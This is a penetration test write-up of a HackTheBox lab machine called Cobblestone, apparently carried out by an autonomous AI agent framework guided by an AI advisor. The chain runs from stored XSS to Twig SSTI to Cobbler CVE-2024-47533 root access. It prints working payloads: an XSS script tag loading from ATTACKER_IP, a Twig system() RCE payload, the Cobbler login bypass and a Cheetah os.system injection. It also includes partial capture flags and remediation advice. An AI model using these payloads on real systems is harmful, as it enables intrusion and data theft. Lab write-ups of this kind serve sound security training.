Full penetration test resulting in complete system compromise through an 11-step attack chain spanning web exploitation, credential extraction, and internal service abuse.
A full-scope penetration test was conducted against the Cobblestone machine on HackTheBox. The engagement resulted in complete system compromise, achieving both user-level and root-level access. The attack chain involved 11 distinct steps spanning web application exploitation, credential extraction, and exploitation of an internal provisioning server (Cobbler).
The primary attack vector was a Server-Side Template Injection (SSTI) vulnerability in the Twig 3.14.0 template engine, accessible through an XSS-to-CSRF chain. This provided Remote Code Execution (RCE) as the www-data user, which was leveraged to extract database credentials and crack password hashes. Privilege escalation to root was achieved through CVE-2024-47533, a critical authentication bypass in the internal Cobbler provisioning server (v3.3.6), combined with Cheetah template injection for code execution.
The assessment targeted IP address 10.129.232.170 (cobblestone.htb) and followed a structured penetration testing methodology consistent with the OWASP Testing Guide and PTES framework.
Hostnames in scope: cobblestone.htb, deploy.cobblestone.htb, vote.cobblestone.htb, mc.cobblestone.htb
Tools used: CyberAgents Autonomous Pentesting Framework (AI-driven agents), Claude Opus 4.6 as External AI Advisor, Nmap, Feroxbuster, SQLMap, John the Ripper, custom Python scripts for XSS/SSTI exploitation, and the CVE-2024-47533 public PoC exploit.
Methodology phases: Reconnaissance (port scanning, virtual host discovery, web technology fingerprinting), Vulnerability Identification (template analysis, dependency enumeration, XSS testing), Initial Exploitation (XSS chain → SSTI → RCE as www-data), Credential Extraction (database dump, hash cracking), User Access (SSH login, chroot jail analysis), and Privilege Escalation (internal service discovery, CVE-2024-47533 exploitation).
The complete path from initial access to full system compromise in 13 steps.
Nmap discovers SSH (22) and HTTP (80). Three virtual hosts identified from HTML source: cobblestone.htb, deploy.cobblestone.htb, vote.cobblestone.htb.
Template files (.html.twig) accessible at /templates/. Twig 3.14.0 confirmed via /vendor/composer/installed.json. Custom PHP backend identified on top of a static Minecraft website template.
Stored XSS via suggest_skin.php — the |raw Twig filter disables autoescaping, allowing injected JavaScript to execute when admin reviews suggestions.
XSS exfiltrates admin panel HTML revealing hidden endpoints: preview_banner.php, upload.php, user.php, and skins_app_admin_server_info.php (phpinfo).
preview_banner.php uses Twig createTemplate($POST[first]) — SSTI confirmed with {{7*7}}→49. RCE achieved via {{["id"]|filter("system")}}. Execution as www-data.
SSTI RCE reads db/connection.php for MySQL credentials, then executes mysqldump to extract the users table with SHA256 password hashes.
John the Ripper cracks the admin hash in under 2 seconds using rockyou.txt. SHA256 without salt — trivially crackable.
Cracked admin password reused for SSH as user "cobble". User is in a chroot jail with restricted bash (rbash) and only 6 binaries available.
User flag retrieved: fb6375087922bd60f679…
ss -tlnp reveals Cobbler on 127.0.0.1:25151. SSH tunnel established. XML-RPC identifies Cobbler v3.3.6.
Cobbler authentication bypass: login("", -1) returns valid admin token due to utils.get_shared_secret() always returning -1. CVSS 9.8.
Cheetah template injection via autoinstall template → #set $null = __import__("os").system("COMMAND") executes as root.
Root flag written to web root and retrieved: 3032fa479f2c4909b9f5…
The initial port scan required the -Pn flag because the host blocks ICMP ping probes. Without this flag, Nmap reports the host as down — a significant initial hurdle that delayed CyberAgents' automated scanning until the External AI advisor identified the issue from the HTTP response.
The main page revealed a Minecraft server website built on the "Minecraft Website Template / Portal" by bybilly (v1.9.2). The original template is purely static HTML/CSS/JavaScript with no PHP backend. This meant all PHP files on the target were custom code built on top of the static template — increasing the likelihood of vulnerabilities.
Technologies identified: Apache 2.4.62, PHP, MySQL/MariaDB, Twig 3.14.0, jQuery.
The main page HTML contained links to three subdomains. The deploy site revealed four team member names whose specializations (firewalls, AppArmor, chroot jails, sysadmin) provided hints about the hardening measures.
Feroxbuster revealed critical directories: /templates/ (readable Twig templates), /vendor/ (Composer packages with installed.json), /db/ (database config), and admin-only endpoints returning 403 (upload.php, user.php).
After registering an account, the authenticated skins.php page revealed a skin database with download and suggestion features. Path traversal on download.php was tested extensively (standard traversal, double encoding, php wrappers) — all blocked by proper input validation.
The vote site had a separate auth system. CyberAgents initially reported SQL injection on the login form, but this was confirmed as a false positive after extensive sqlmap testing at level 5/risk 3.
The accessible /vendor/composer/installed.json revealed Twig 3.14.0. Three research agents were launched to analyze Twig's source code on GitHub, identify SSTI bypass techniques, and catalog RCE payloads. Key finding: SSTI is only possible when the developer uses createTemplate() with user input, and the RCE payload {{["id"]|filter("system")}} calls PHP's system() function.
Reading suggest.html.twig revealed the critical vulnerability — the |raw filter in Twig disables HTML autoescaping. All three fields (username, name, url) in the suggestions table were rendered with |raw, meaning any HTML/JavaScript would execute when the admin reviews suggestions.
The XSS was delivered through the name field using an external JavaScript file: <script src=http://ATTACKER_IP:9999/x.js></script>. The admin bot reviewed suggestions approximately every 60 seconds. Initial callback confirmed HttpOnly cookies, so the strategy pivoted to exfiltrating page content.
The XSS exfiltrated the admin's skins.php HTML, revealing four admin-only tabs and a critical hidden endpoint: preview_banner.php, found in the User Management tab's JavaScript code. This endpoint accepted a POST parameter "first" and turned out to be the SSTI vulnerability.
Using the XSS to make the admin's browser call preview_banner.php with a test payload, the SSTI was immediately confirmed:
The developer had passed user input directly to createTemplate(), which compiles the string as Twig code. RCE was achieved with {{["id"]|filter("system")}}, which maps to PHP's array_filter() with system() as the callback:
Two significant constraints: complex shell commands with pipes/redirects failed through the XSS→JS→URL→Twig chain, and the target had egress firewall rules blocking all outbound connections, preventing reverse shells.
The SSTI RCE read db/connection.php to extract MySQL credentials. Since complex commands with pipes failed through the SSTI chain, mysqldump was used instead (all parameters as CLI arguments, no shell operators needed).
Two user records were extracted with SHA256 password hashes (no salt). John the Ripper cracked the admin hash in under 2 seconds using rockyou.txt. The cracked password also worked for SSH access as the cobble user — a credential reuse vulnerability.
The cobble user was heavily restricted with both a chroot jail and restricted bash (rbash). Only 6 binaries were available: cat, grep, ls, ps, rbash, ss. No sudo, bash, python, perl, nc, curl, or wget. The deploy site had hinted at this: "Katrina Robinson: Expert for restricting users with chroot jails."
Despite the restrictions, cat user.txt retrieved the user flag, and ss -tlnp revealed an unknown internal service on port 25151.
An SSH tunnel exposed port 25151, which was identified as Cobbler v3.3.6 — a Linux provisioning server that manages PXE boot, DHCP, DNS, and system installations. The machine name "Cobblestone" was a direct hint about this software. Cobbler runs as root, making it a prime privilege escalation target.
This critical vulnerability in Cobbler 3.0.0–3.3.6 exists because utils.get_shared_secret() always returns -1, allowing anyone to authenticate with an empty username and the integer -1 as the password.
Cobbler uses Cheetah templates for kickstart/autoinstall files. A malicious template with #set $null = __import__("os").system("COMMAND") executes arbitrary commands as root when Cobbler renders the template. The root flag was written to a web-accessible location and retrieved via HTTP.
| ID | Vulnerability | Severity | CVSS |
|---|---|---|---|
| V-001 | CVE-2024-47533: Cobbler XML-RPC Authentication Bypass | Critical | 9.8 |
| V-002 | Twig SSTI via createTemplate() in preview_banner.php | Critical | 9.1 |
| V-003 | Stored XSS via |raw filter in suggest.html.twig | High | 8.1 |
| V-004 | Database credentials in accessible PHP file | High | 7.5 |
| V-005 | Twig template files readable via HTTP | High | 6.5 |
| V-006 | Composer dependency file exposed | Medium | 5.3 |
| V-007 | SHA256 password hashing without salt | Medium | 5.0 |
| V-008 | Credential reuse (admin web = cobble SSH) | Medium | 4.5 |
| V-009 | phpinfo() exposed via admin endpoint | Low | 3.1 |
| V-010 | Internal Cobbler service accessible via SSH tunnel | Info | — |
CyberAgents initially couldn't detect port 80 because the host blocks ping. The External AI Advisor identified this from the HTTP 302 response and added -Pn to all scan commands.
Special characters breaking login was initially mistaken for SSTI. Systematic testing showed ALL special chars caused failures — input validation, not template compilation.
The SSTI was in a hidden admin-only endpoint (preview_banner.php), discovered by reading the user.html.twig template source code from the accessible /templates/ directory.
The target blocked all outbound connections. All RCE output had to be exfiltrated through the admin browser's XSS callbacks or written to web-accessible files.
Complex shell commands failed through the XSS→JS→URL→Twig chain. The solution was using tools like mysqldump that take parameters as CLI arguments without shell operators.
The first PoC used reverse shells (blocked by firewall). The second PoC used Cheetah template injection, executing commands server-side without requiring outbound connectivity.
Upgrade Cobbler to version 3.3.7 or later. Restrict XML-RPC port (25151) to only authorized management IPs using firewall rules. Consider disabling the XML-RPC interface entirely if not needed.
Replace createTemplate($userInput) with variable substitution: $twig->render("header.html.twig", ["first" => $userInput]). Never pass user input to createTemplate() or template_from_string().
Remove |raw filters from all Twig templates that render user input. Twig's default autoescaping is sufficient for HTML output safety.
Move database credentials outside the web root. Use environment variables or a configuration file in a non-web-accessible directory.
Configure Apache to deny access to /templates/, /vendor/, and /db/ directories. Block access to installed.json and all vendor files.
Replace SHA256 with bcrypt or Argon2 using PHP's password_hash(). Enforce unique passwords per service. Use SSH keys instead of passwords.
How the autonomous agent framework and the External AI Advisor contributed to each phase of the engagement.
Performed port scanning and service detection. Initially failed due to missing -Pn flag (host blocks ICMP), causing a ~10 minute delay until the External AI corrected the scan parameters. After correction, full scan completed successfully.
Content discovery across all four virtual hosts. Identified the critical /templates/, /vendor/, and /db/ directories. Discovered admin-only endpoints returning 403 (upload.php, user.php).
Performed extensive SQL injection testing on the vote site's login form (level 5/risk 3). Correctly identified the initial positive as a false positive — an important contribution that prevented wasting time on a dead-end attack vector.
Enumerated known exploits for identified services (Apache 2.4.62, OpenSSH 9.2p1, Twig 3.14.0). Cataloged relevant CVEs and provided exploit references for the research phase.
Multiple agents worked simultaneously across different attack surfaces — scanning all four virtual hosts in parallel, running directory brute-force on multiple targets concurrently, and launching three research agents for Twig SSTI analysis at the same time.
Extracted links from all pages, identifying the three virtual host subdomains from the main page HTML. Discovered team member names on the deploy site that hinted at system hardening measures.
Detected the host-blocking-ping issue from the HTTP response analysis (curl returned a 302 redirect, proving the host was up) and added the -Pn requirement to all scan commands via the ExternalAI.txt advisory file.
Researched the bybilly Minecraft template on GitHub, confirming the original is purely static HTML/CSS with no PHP backend. This was critical for understanding that all PHP files were custom code — high vulnerability likelihood.
Launched three parallel research agents to analyze Twig's source code on GitHub, identify SSTI bypass techniques, and catalog RCE payloads. Key finding: SSTI requires createTemplate() with user input, and the |filter("system") callback enables RCE.
Discovered preview_banner.php by analyzing the user.html.twig template source code from the accessible /templates/ directory. This was the SSTI vulnerability that no automated scanner would have found.
Architected the complete multi-step exploitation chain: stored XSS payload delivery → admin panel HTML exfiltration → SSTI confirmation via {{7*7}} → RCE via filter callback → command output exfiltration through XSS callbacks.
Identified the Cobbler authentication bypass CVE and, critically, selected the correct PoC for the egress-filtered environment. The first PoC used reverse shells (blocked by firewall); the advisor identified the Cheetah template injection PoC that works without outbound connectivity.
| Component | Rating | Notes |
|---|---|---|
| NmapAgent | Good (with correction) | Initial failure on -Pn, but recovered quickly after External AI advisory. |
| FeroxbusterAgent | Excellent | Discovered all critical directories and admin endpoints. |
| SQLMapAgent | Excellent | Correctly ruled out false-positive SQL injection, saving time. |
| SearchSploitAgent | Good | Effective CVE enumeration for all identified services. |
| Parallel Coordination | Excellent | Multi-agent parallel execution across 4 virtual hosts. |
| External AI Advisor | Essential | Designed the full exploit chain, identified hidden endpoints, selected correct PoC. |
| Overall Engagement | Success | Full compromise in ~3 hours. User + Root flags captured. |